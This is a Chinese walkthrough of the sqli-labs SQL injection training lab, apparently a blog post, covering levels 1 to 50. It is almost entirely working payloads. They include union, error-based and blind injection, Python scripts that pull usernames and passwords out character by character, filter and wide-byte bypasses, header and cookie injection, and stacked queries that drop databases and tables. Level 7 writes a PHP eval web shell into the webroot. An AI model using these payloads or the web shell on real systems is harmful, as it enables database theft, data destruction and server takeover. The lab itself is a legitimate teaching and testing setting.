一、前言
-
虽然之前刚开始学的时候已经打过一边,但当时可能懵懵懂懂,现在回过头来再过一遍。
-
用linux虚拟机docker直接一键,访问虚拟机ip80端口即可。
docker search sqli-labs 搜索镜像 docker pull acgpiano/sqli-labs 拉取镜像 docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs 运行镜像。
-
建议都用手敲一遍。熟悉相关函数和指令。本文可能不会详细介绍分析详情只写payload,但如果有不懂的或有什么问题,直接留言即可,我会尽快回复。
二、正文
less-1
-
无过滤单引号闭合。
?id=0' union select 1,2,database()--+ 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-2
-
变量为整数型,同上。
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-3
-
同less-1,只不过闭合方式多了个括号。
?id=0') union select 1,2,database()--+ 查看数据库 ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-4
-
同less-3,只不过单引号变双引号。
?id=0") union select 1,2,database()--+ 查看数据库 ?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0") union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-5
-
其实这里可以用布尔盲注的,但有回显还是用报错注入。
?id=0' and extractvalue(1,concat(1,(select database())))--+ 查看数据库 ?id=0' and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ 查看表 ?id=0' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+ 查看字段 ?id=0' and extractvalue(1,substring(concat(1,(select group_concat(username,0x3e,password) from users)),1,32))--+ 查看内容
-
同理
?id=0' and updatexml(1,concat(1,(select database())),1)--+ ?id=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?id=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?id=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-6
-
同less-5,只不过单引号变双引号,试试floor函数报错。
?id=0" union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看数据库 ?id=0" union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看表 ?id=0" union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看字段 ?id=0" union select 1 from (select count(*),concat((select password from users limit 11,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看内容
-
还有exp报错。
?id=0" and exp(~(select * from(select database())a));--+ 查看数据库 ?id=0" and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a));--+ 查看表 ?id=0" and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')a));--+ 查看字段 ?id=0" and exp(~(select * from(select group_concat(username,0x3e,password) from users)a));--+ 查看内容
-
还有下面的也都可以
?id=0" and geometrycollection((select * from(select * from(select database())a)b))--+ ?id=0" and multipoint((select * from(select * from(select database())a)b))--+ ?id=0" and polygon((select * from(select * from(select database())a)b))--+ ?id=0" and multipolygon((select * from(select * from(select database())a)b))--+ ?id=0" and linestring((select * from(select * from(select database())a)b))--+ ?id=0" and multilinestring((select * from(select * from(select database())a)b))--+
less-7
-
可以写一句话木马。然后用蚁剑连接就行。
?id=1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "/var/www/html/1.php" --+
-
对应的如果有回显可以读取文件
?id=0' union select 1,2,load_file('/flag')--+
less-8
- 布尔盲注
import requests
url = "http://192.168.0.4:84/Less-8/?id=0'||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,1,0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)--+'%(i,mid)
r = requests.get(url + payload)
if "..........." in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
less-9
- 时间盲注
import requests
url = "http://192.168.0.4:84/Less-9/?id=0'||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-10
-同上时间盲注,只是将单引号换成双引号。
import requests
url = 'http://192.168.0.4:84/Less-10/?id=0"||'
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-11
-
最简单的POST联合注入,可以用浏览器插件HackBar。
uname=0' union select 1,database()--+&passwd=1 查看数据库 uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1 查看表 uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1 查看字段 uname=0' union select 1,group_concat(username,0x3e,password) from users--+&passwd=1 查看内容
less-12
-
同less-11,改变了闭合方式。
uname=0") union select 1,database()--+&passwd=1 查看数据库 uname=0") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1 查看表 uname=0") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1 查看字段 uname=0") union select 1,group_concat(username,0x3e,password) from users--+&passwd=1 查看内容
less-13
-
有报错回显,选择报错注入。
uname=0') and updatexml(1,concat(1,database()),2)--+&passwd=1 查看数据库 uname=0') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1 查看表 uname=0') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1 查看字段 uname=0') and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1 查看内容
less-14
-
有报错回显,选择报错注入。
uname=0" and updatexml(1,concat(1,database()),2)--+&passwd=1 查看数据库 uname=0" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1 查看表 uname=0" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1 查看字段 uname=0" and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1 查看内容
less-15
- POST型时间盲注。
import requests
url = "http://192.168.3.39:84/Less-15/"
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
data_database= {
'uname': """admin' and if(ascii(substr(database(),%d,1))>%d,sleep(3),1)#"""%(i,mid),
'passwd':'0'
}
data_table= {
'uname': """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(3),1)#"""%(i,mid),
'passwd':'0'
}
data_column= {
'uname': """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,sleep(3),1)#"""%(i,mid),
'passwd':'0'
}
data_value= {
'uname': """admin' and if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(3),1)#"""%(i,mid),
'passwd':'0'
}
try:
r = requests.post(url, data=data_value, timeout=2)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-16
- 同less-15,将单引号换为了双引号和括号,可以试试布尔盲注。
import requests
url = "http://192.168.3.39:84/Less-16/"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
data_database= {
'uname': """0")||if(ascii(substr(database(),%d,1))>%d,1,0)#"""%(i,mid),
'passwd':'0'
}
data_table= {
'uname': """0")||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#"""%(i,mid),
'passwd':'0'
}
data_column= {
'uname': """0")||if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,1,0)#"""%(i,mid),
'passwd':'0'
}
data_value= {
'uname': """0")||if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)#"""%(i,mid),
'passwd':'0'
}
r = requests.post(url=url,data=data_value)
if "flag.jpg" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
less-17
-
对uname有转义处理,所以注入点为passwd,同时最后查内容无法直接查看,嵌套一层子查询。
uname=admin&passwd=1' and updatexml(1,concat(1,database()),2)--+ 查看数据库 uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+ 查看字段 uname=admin&passwd=1' and updatexml(1,concat(0x3e,(select password from (select password from users limit 3,1) aaa ),0x3e),1) --+ 查看内容
less-18
-
报错注入,注入点在请求头headers信息中的User-Agent。用burp抓包修改,同时得POST传入uname=admin&passwd=admin。
User-Agent:0'||updatexml(1,concat(1,database()),1)--+' 查看数据库 User-Agent:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+' 查看表 User-Agent:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+' 查看字段 User-Agent:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+' 查看内容
less-19
-
报错注入,注入点在请求头headers信息中的Referer,同less-18。
Referer:0'||updatexml(1,concat(1,database()),1)--+' 查看数据库 Referer:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+' 查看表 Referer:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+' 查看字段 Referer:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+' 查看内容
less-20
-
直接联合注入,注入点在请求头headers信息中的cookie。
Cookie: uname=0' union select 1,2,database()--+ 查看数据库 Cookie: uname=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 Cookie: uname=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 查看字段 Cookie: uname=0' union select 1,2,group_concat(username,0x3e,password) from users--+ 查看内容
less-21
-
联合注入,注入点在请求头headers信息中的cookie,只不过多了一个base64编码处理,闭合方式为单引号加括号。
Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM= 查看数据库 Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSM= 查看表 Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyM= 查看字段 Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4M2UscGFzc3dvcmQpIGZyb20gdXNlcnMj 查看内容
less-22
-
联合注入,注入点在请求头headers信息中的cookie,只不过多了一个base64编码处理,闭合方式为单引号加括号。
Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw== 查看数据库 Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw== 查看表 Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw== 查看字段 Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzZSxwYXNzd29yZCkgZnJvbSB1c2VycyM= 查看内容
less-23
-
联合注入,过滤了注释符,有回显。
?id=0' union select 1,2,database()' 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,password) from users where '1 查看内容
less-24
- 二次注入。通过数据的存储和读取处理差异的不同来造成注入效果。
- 先注册
admin'#
用户,再修改密码,退出再以修改后的密码来登录admin
用户。
less-25
-
过滤了
or
、and
,直接联合注入也行,或者用||
、&&
代替,或者双写oorr
、anandd
绕过?id=0' union select 1,2,database()' 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security 查看表 ?id=0' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,passwoorrd) from users where '1 查看内容
-
或者时间盲注,前面的脚本改改就能用。
import requests
url = 'http://192.168.3.39:84/Less-25/?id=0\' oorr '
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-25a
-
同上
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,passwoorrd) from users --+ 查看内容
-
或者时间盲注,前面的脚本改改就能用。
import requests
url = 'http://192.168.3.39:84/Less-25a/?id=0 oorr '
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-26
-
过滤了空格和注释符和
or
,可以用括号风格和引号闭合,和双写绕过。?id=0'||updatexml(1,concat(1,database()),1)||'0 查看数据库 ?id=0'||updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1)||'0。 查看表 ?id=0'||updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))),1)||'0 查看字段 ?id=0'||updatexml(1,concat(1,(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),1,32))),1)||'0 查看内容
less-26a
- 同上,可以用布尔盲注
import requests
url = "http://192.168.3.39:84/Less-26a/?id=0')||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)||(\'0'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name="users")),%d,1))>%d,1,0)||(\'0'%(i,mid)
payload = 'if(ascii(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),%d,1))>%d,1,0)||(\'0'%(i,mid)
r = requests.get(url + payload)
if "Dumb" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
less-27
-
过滤了
union
、select
等,大写绕过。?id=0'%0aUNion%0aSElect%0a1,database(),3||'0 查看数据库 ?id=0'%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||'0 查看表 ?id=0'%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||'0 查看字段 ?id=0'%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||'0 查看字段
less-27a
-
同上,单引号换双引号
?id=0"%0aUNion%0aSElect%0a1,database(),3||"0 查看数据库 ?id=0"%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||"0 查看表 ?id=0"%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||"0 查看字段 ?id=0"%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||"0 查看字段
less-28
-
过滤了
union select
整体?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0 查看数据库 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0 查看表 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0 查看字段 ?id=0')%0auniounion %0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0 查看字段
less-28a
-
同less-28
?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0 查看数据库 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0 查看表 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0 查看字段 ?id=0')%0auniounion%0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0 查看字段
less-29
-
不同web服务器解析规则不同。
?id=1&id=-1' union select 1,2,database() --+ 查看数据库 ?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=1&id=-1' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-30
-
同less-29。
?id=1&id=-1" union select 1,2,database() --+ 查看数据库 ?id=1&id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=1&id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=1&id=-1" union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-31
-
同less-29。
?id=1&id=-1") union select 1,2,database() --+ 查看数据库 ?id=1&id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=1&id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=1&id=-1") union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-32
-
addslashes()转义。
?id=-1%bb' union select 1,2,database() --+ 查看数据库 ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-33
-
同less-32。
?id=-1%bb' union select 1,2,database() --+ 查看数据库 ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-34
-
同宽字节注入,用burp抓包修改。
uname=a%bb' union select 1,database()#&passwd=1&submit=Submit 查看数据库 uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit 查看表 uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit 查看字段 uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit 查看字段
less-35
-
整数型
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users--+ 查看字段
less-36
-
同less-32。
?id=-1%bb' union select 1,2,database() --+ 查看数据库 ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-37
-
同宽字节注入,用burp抓包修改。
uname=a%bb' union select 1,database()#&passwd=1&submit=Submit 查看数据库 uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit 查看表 uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit 查看字段 uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit 查看字段
less-38
-
堆叠注入,可以执行多条sql语句,查看数据库内容可以用联合注入,用
;
分割可执行任意sql语句。甚至是删除数据库;drop database security;--+
?id=0' union select 1,2,database()--+ 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-39
-
同less-38,整数型,可以执行任意sql语句。
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-40
-
同less-38,单引号加括号闭合。
?id=0') union select 1,2,database()--+ 查看数据库 ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-41
-
同less-38,整型。
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-42
-
可以用前面的二次注入。可以堆叠注入,在llogin.php的password中,比如说复制一个表。
login_user=1&login_password=1';create table a like users;--+
less-43
-
同less-42,单引号加括号闭合。
login_user=1&login_password=1');create table a like users;--+
less-44
-
同less-42
login_user=1&login_password=1';create table a like users;--+
less-45
-
同less-43
login_user=1&login_password=1');drop table a;--+
less-46
-
order by从句。有报错回显,整型。
?sort=0 and updatexml(1,concat(1,(select database())),1)--+ ?sort=0 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?sort=0 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?sort=0 and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-47
-
同 less46,单引号闭合
?sort=0' and updatexml(1,concat(1,(select database())),1)--+ ?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-48
- 时间盲注
import requests
url = 'http://192.168.3.39:84/Less-48/?sort=0||'
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-49
- 时间盲注
import requests
url = 'http://192.168.3.39:84/Less-49/?sort=0\'||'
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-50
- 时间盲注
import requests
url = 'http://192.168.3.39:84/Less-50/?sort=0||'
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-51
-
